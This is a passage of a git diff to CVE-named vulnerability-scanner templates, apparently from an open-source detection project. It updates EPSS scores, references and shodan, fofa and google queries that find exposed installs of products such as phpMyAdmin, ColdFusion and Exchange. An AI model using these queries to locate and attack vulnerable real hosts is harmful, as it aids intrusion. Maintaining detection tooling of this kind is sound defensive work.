b/http/cves/2001/CVE-2001-0537.yaml @@ -29,7 +29,10 @@ info: max-request: 1 vendor: cisco product: ios - shodan-query: product:"Cisco IOS http config" && 200 + shodan-query: + - product:"Cisco IOS http config" && 200 + - product:"cisco ios http config" + - cpe:"cpe:2.3:o:cisco:ios" tags: cve,cve2001,cisco,ios,auth-bypass http: diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 0422de46ab..a16058ffa9 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -20,14 +20,16 @@ info: cvss-score: 7.5 cve-id: CVE-2002-1131 cwe-id: CWE-80 - epss-score: 0.06018 - epss-percentile: 0.92781 + epss-score: 0.04774 + epss-percentile: 0.92677 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: squirrelmail product: squirrelmail - shodan-query: http.title:"squirrelmail" + shodan-query: + - http.title:"squirrelmail" + - cpe:"cpe:2.3:a:squirrelmail:squirrelmail" fofa-query: title="squirrelmail" google-query: intitle:"squirrelmail" tags: cve,cve2002,edb,xss,squirrelmail diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 1293c3640f..409d18f673 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2005-2428 cwe-id: CWE-200 epss-score: 0.01188 - epss-percentile: 0.83623 + epss-percentile: 0.85053 cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index cf64ff3ab9..293da33ddf 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: sap product: sap_web_application_server - shodan-query: html:"SAP Business Server Pages Team" + shodan-query: + - html:"SAP Business Server Pages Team" + - http.html:"sap business server pages team" fofa-query: body="sap business server pages team" tags: cve,cve2005,sap,redirect,business,xss diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 4cc42895e6..009068efb5 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: squirrelmail product: squirrelmail - shodan-query: http.title:"squirrelmail" + shodan-query: + - http.title:"squirrelmail" + - cpe:"cpe:2.3:a:squirrelmail:squirrelmail" fofa-query: title="squirrelmail" google-query: intitle:"squirrelmail" tags: cve,cve2006,lfi,squirrelmail,edb diff --git a/http/cves/2007/CVE-2007-3010.yaml b/http/cves/2007/CVE-2007-3010.yaml index 913a3cbfcd..a6fb965688 100644 --- a/http/cves/2007/CVE-2007-3010.yaml +++ b/http/cves/2007/CVE-2007-3010.yaml @@ -29,10 +29,15 @@ info: max-request: 1 vendor: alcatel-lucent product: omnipcx - shodan-query: title:"OmniPCX for Enterprise" - fofa-query: app="Alcatel_Lucent-OmniPCX-Enterprise" + shodan-query: + - title:"OmniPCX for Enterprise" + - http.title:"omnipcx for enterprise" + fofa-query: + - app="Alcatel_Lucent-OmniPCX-Enterprise" + - app="alcatel_lucent-omnipcx-enterprise" + - title="omnipcx for enterprise" google-query: intitle:"omnipcx for enterprise" - tags: cve,cve2007,kev,rce,alcatel + tags: cve,cve2007,kev,rce,alcatel,alcatel-lucent http: - method: GET diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 45c71789e7..24f9121dbb 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -20,14 +20,17 @@ info: cvss-score: 4.3 cve-id: CVE-2007-5728 cwe-id: CWE-79 - epss-score: 0.02361 - epss-percentile: 0.88734 + epss-score: 0.0153 + epss-percentile: 0.87042 cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phppgadmin product: phppgadmin - shodan-query: http.title:"phpPgAdmin" + shodan-query: + - http.title:"phpPgAdmin" + - http.title:phppgadmin + - cpe:"cpe:2.3:a:phppgadmin_project:phppgadmin" fofa-query: title=phppgadmin google-query: intitle:phppgadmin tags: cve2007,cve,xss,pgadmin,phppgadmin,edb diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 929c258686..6f5363d6e1 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -25,9 +25,9 @@ info: epss-percentile: 0.7961 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: wordpress - product: sniplets_plugin + product: "sniplets_plugin" tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets flow: http(1) && http(2) diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 1b24dd80bf..ce685b89f6 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -28,8 +28,14 @@ info: max-request: 2 vendor: microsoft product: exchange_server - shodan-query: http.title:"Outlook" - fofa-query: title="outlook" + shodan-query: + - http.title:"Outlook" + - http.favicon.hash:1768726119 + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - title="outlook" + - icon_hash=1768726119 google-query: intitle:"outlook" tags: cve2008,cve,redirect,owa,exchange,microsoft diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 71ba384ff2..02dc427002 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: phppgadmin product: phppgadmin - shodan-query: http.title:"phpPgAdmin" + shodan-query: + - http.title:"phpPgAdmin" + - http.title:phppgadmin + - cpe:"cpe:2.3:a:phppgadmin_project:phppgadmin" fofa-query: title=phppgadmin google-query: intitle:phppgadmin tags: cve,cve2008,lfi,phppgadmin,edb diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 213d660b5b..9b6d674098 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -29,9 +29,16 @@ info: max-request: 1 vendor: parallels product: h-sphere - shodan-query: title:"Parallels H-Sphere - fofa-query: title="h-sphere" - google-query: intitle:"h-sphere" + shodan-query: + - title:"Parallels H-Sphere + - http.title:"h-sphere" + - http.title:"parallels h-sphere" + fofa-query: + - title="h-sphere" + - title="parallels h-sphere" + google-query: + - intitle:"h-sphere" + - intitle:"parallels h-sphere" tags: cve,cve2008,xss,parallels,h-sphere http: diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 384346aaaf..2dd76ed994 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -15,13 +15,14 @@ info: - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download - https://nvd.nist.gov/vuln/detail/CVE-2008-6982 - https://exchange.xforce.ibmcloud.com/vulnerabilities/44940 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2008-6982 cwe-id: CWE-79 epss-score: 0.0038 - epss-percentile: 0.70097 + epss-percentile: 0.72879 cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index bef38ec236..86be48dde0 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: boka product: siteengine - shodan-query: html:"SiteEngine" + shodan-query: + - html:"SiteEngine" + - http.html:"siteengine" fofa-query: body="siteengine" tags: cve,cve2008,redirect,siteengine,boka diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index a5a63a7618..39895ba5ff 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: phpmyadmin product: phpmyadmin - shodan-query: http.title:"phpmyadmin" - fofa-query: title="phpmyadmin" + shodan-query: + - http.title:"phpmyadmin" + - http.component:"phpmyadmin" + - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" + fofa-query: + - title="phpmyadmin" + - body="pma_servername" && body="4.8.4" google-query: intitle:"phpmyadmin" hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 7cfccf1119..bfb5193114 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2009-1496 cwe-id: CWE-22 - epss-score: 0.00802 - epss-percentile: 0.81288 + epss-score: 0.01134 + epss-percentile: 0.84662 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 7bc7dbdd0a..09cdaa2871 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -28,8 +28,14 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: title="coldfusion administrator login" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve2009,cve,adobe,xss,coldfusion,tenable diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index 1968203952..503b926355 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: joomla product: joomla\! - shodan-query: http.html:"joomla! - open source content management" + shodan-query: + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" tags: cve,cve2009,joomla,lfi,photo,edb diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index cc83c7f706..4c3348b407 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2009-5114 cwe-id: CWE-22 - epss-score: 0.01329 - epss-percentile: 0.85735 + epss-score: 0.01077 + epss-percentile: 0.84241 cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 2085401446..9bc5fbd1c1 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: joomla product: joomla\! - shodan-query: http.html:"joomla! - open source content management" + shodan-query: + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" tags: cve2010,cve,joomla,lfi,edb,packetstorm diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 12954e5e22..3d06d8decf 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: apache product: axis2 - shodan-query: http.html:"Apache Axis" + shodan-query: + - http.html:"Apache Axis" + - http.html:"apache axis" fofa-query: body="apache axis" tags: cve,cve2010,axis,apache,default-login,axis2 diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 151317113f..6c3c0bad7b 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0696 cwe-id: CWE-22 epss-score: 0.57303 - epss-percentile: 0.97418 + epss-percentile: 0.97701 cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 4fab435111..a982982ba5 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0944 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index a553692caa..a0ff1cec33 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -13,13 +13,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-0985 - http://www.exploit-db.com/exploits/10948 - https://exchange.xforce.ibmcloud.com/vulnerabilities/55348 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0985 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.83839 + epss-percentile: 0.85327 cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index e4bc052eb4..99cd149e3a 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1219 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.81406 + epss-percentile: 0.81755 cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index e951d57d27..d9ffa0d039 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1314 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index 34e59780d7..cd8af4ca6b 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1352 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 2bacf238d4..6a39c5a97a 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -29,7 +29,10 @@ info: max-request: 1 vendor: redhat product: jboss_enterprise_application_platform - shodan-query: title:"JBoss" + shodan-query: + - title:"JBoss" + - cpe:"cpe:2.3:a:redhat:jboss_enterprise_application_platform" + - http.title:"jboss" fofa-query: title="jboss" google-query: intitle:"jboss" tags: cve2010,cve,jboss,eap,tomcat,exposure,redhat diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 2ee9dcd3fa..de7a213dc7 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1470 cwe-id: CWE-22 epss-score: 0.04616 - epss-percentile: 0.92373 + epss-percentile: 0.92547 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index a257cd200a..e4bb02c47e 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1475 - http://www.exploit-db.com/exploits/12147 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57652 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1475 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83996 + epss-percentile: 0.85468 cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index 12ccceb83b..17455eef2b 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1531 cwe-id: CWE-22 epss-score: 0.01815 - epss-percentile: 0.86892 + epss-percentile: 0.88163 cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index faa548a7ba..b3d99ecc70 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1601 cwe-id: CWE-22 epss-score: 0.01299 - epss-percentile: 0.84437 + epss-percentile: 0.85844 cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 9866062708..e5b89969c0 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1603 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.91267 + epss-percentile: 0.91491 cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 72fac83966..22a4cc07ea 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1719 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.87378 + epss-percentile: 0.87631 cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 6395aa9c92..afe80d3941 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -27,8 +27,14 @@ info: max-request: 2 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2010,packetstorm,edb,rce,listserv,ognl,apache diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index c0a0bcad10..fdaa4166f1 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1875 - http://www.exploit-db.com/exploits/11851 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57110 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1875 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.83839 + epss-percentile: 0.85327 cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 8ef35d4b8e..c668fb5d97 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1981 cwe-id: CWE-22 epss-score: 0.00656 - epss-percentile: 0.77311 + epss-percentile: 0.79446 cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 57d5f2b9da..6bd6723fef 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2035 cwe-id: CWE-22 - epss-score: 0.07071 - epss-percentile: 0.93832 + epss-score: 0.08973 + epss-percentile: 0.94583 cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 91a05a5cee..37283f304a 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2128 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.84048 + epss-percentile: 0.85468 cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 3b14b099fc..72c48811af 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2010-2307 cwe-id: CWE-22 - epss-score: 0.00813 - epss-percentile: 0.81409 + epss-score: 0.00917 + epss-percentile: 0.82851 cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 20656fe948..7dd9f3c1fa 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2857 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.81565 + epss-percentile: 0.8192 cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 45c0984796..3e0bac5c35 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: title="coldfusion administrator login" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 23c6b25fd1..9074aba40f 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -11,13 +11,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-2920 - http://www.vupen.com/english/advisories/2010/1844 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57660 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2920 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90637 + epss-percentile: 0.91571 cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index b65b57629d..a9858ba5cc 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4719 cwe-id: CWE-22 epss-score: 0.04503 - epss-percentile: 0.92278 + epss-percentile: 0.92461 cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 4ca77e7694..d5b6f27b0a 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-1669 cwe-id: CWE-22 epss-score: 0.02966 - epss-percentile: 0.89875 + epss-percentile: 0.90858 cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 8df63641aa..2ab467d52d 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -19,17 +19,16 @@ info: cvss-score: 4.3 cve-id: CVE-2011-4624 cwe-id: CWE-79 - epss-score: 0.00431 - epss-percentile: 0.74018 + epss-score: 0.00446 + epss-percentile: 0.74948 cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: codeasily - product: grand_flagallery + product: "grand_flagallery" framework: wordpress - google-query: inurl:"/wp-content/plugins/flash-album-gallery" + google-query: "inurl:\"/wp-content/plugins/flash-album-gallery\"" tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily - flow: http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml index 09462b8d17..c1900d4046 100644 --- a/http/cves/2011/CVE-2011-4640.yaml +++ b/http/cves/2011/CVE-2011-4640.yaml @@ -21,8 +21,12 @@ info: max-request: 3 vendor: spamtitan product: webtitan - shodan-query: title:"WebTitan" - fofa-query: icon_hash=1090061843 + shodan-query: + - title:"WebTitan" + - http.favicon.hash:1090061843 + fofa-query: + - icon_hash=1090061843 + - title="webtitan" tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated http: diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index b1856cb394..11e84a5014 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -24,10 +24,10 @@ info: epss-percentile: 0.88084 cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: bueltge product: adminimize - google-query: inurl:"/wp-content/plugins/adminimize/" + google-query: "inurl:\"/wp-content/plugins/adminimize/\"" tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge flow: http(1) && http(2) diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index b357da58e8..114f3e7776 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -23,12 +23,11 @@ info: epss-percentile: 0.6058 cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: wordpress - product: alert_before_you_post - google-query: inurl:"/wp-content/plugins/alert-before-your-post" + product: "alert_before_you_post" + google-query: "inurl:\"/wp-content/plugins/alert-before-your-post\"" tags: cve,cve2011,wordpress,xss,wp-plugin - flow: 